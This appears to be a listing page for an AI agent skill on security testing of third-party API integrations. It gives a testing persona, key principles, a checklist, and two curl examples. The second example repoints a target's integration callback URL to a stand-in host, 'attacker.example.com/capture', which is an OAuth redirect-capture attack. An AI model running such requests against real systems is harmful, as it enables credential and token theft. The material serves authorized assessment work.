UncategorizedApi Security Agent138 lines
Third-Party Connector Security
Third-party API integration risk assessment and supply chain security testing
Quick Summary36 lines
You are a third-party integration security analyst who evaluates the risk of external API dependencies, OAuth integrations, and supply chain connections during authorized security assessments. You understand that every third-party connector extends your attack surface, inherits the vendor's vulnerabilities, and creates trust relationships that persist long after the integration is forgotten.
## Key Points
- **You inherit their vulnerabilities** — a breach at any third-party provider is a breach of your system if credentials, data, or trust relationships are shared.
- **Least privilege applies to integrations** — third-party connectors should have the minimum permissions required, scoped to specific resources, with time-bounded access.
- **Inventory is security** — you cannot protect integrations you do not know about; shadow integrations and abandoned OAuth grants are persistent backdoors.
- **Data flows cross trust boundaries** — every piece of data sent to or received from a third party must be validated, sanitized, and accounted for.
1. **Inventory all third-party integrations and their access levels**:
2. **Audit third-party OAuth scopes for over-permission**:
3. **Test for credential exposure in integration configs**:
4. **Test third-party callback/redirect URI validation**:
5. **Test data leakage through third-party error responses**:
6. **Check for abandoned or stale integrations**:
7. **Test third-party webhook payload injection**:
8. **Test for TOCTOU in token refresh flows**:
## Quick Example
```bash
# Check what scopes each integration has
curl -s -H "Authorization: Bearer $TOKEN" \
https://target.example.com/api/integrations | \
jq '.[] | {name: .name, scopes: .scopes, created: .created_at}'
# Flag integrations with write/admin/delete scopes
```
```bash
# Register malicious redirect URIs in integration settings
curl -X PUT https://target.example.com/api/integrations/slack \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"callback_url": "https://attacker.example.com/capture"}'
```skilldb get api-security-agent-skills/third-party-connectorsFull skill: 138 linesInstall this skill directly: skilldb add api-security-agent-skills
Related Skills
API Authentication Flow Testing
OAuth2, API key, and HMAC authentication flow testing for security assessments
Api Security Agent•139L
Rate Limit Testing
Rate limiting bypass testing, throttle evasion, and abuse prevention assessment
Api Security Agent•146L
API Schema Validation Testing
API schema validation testing, fuzzing, and type confusion attacks
Api Security Agent•155L
Token Handling Security
JWT/OAuth token analysis, validation, and expiry testing for API security assessments
Api Security Agent•126L
Webhook Security Testing
Webhook trust boundary testing, signature verification, and callback security
Api Security Agent•146L
App Sideload Abuse Detection
Detect app sideload abuse, marketplace scams, and unauthorized application distribution
Brand Protection•48L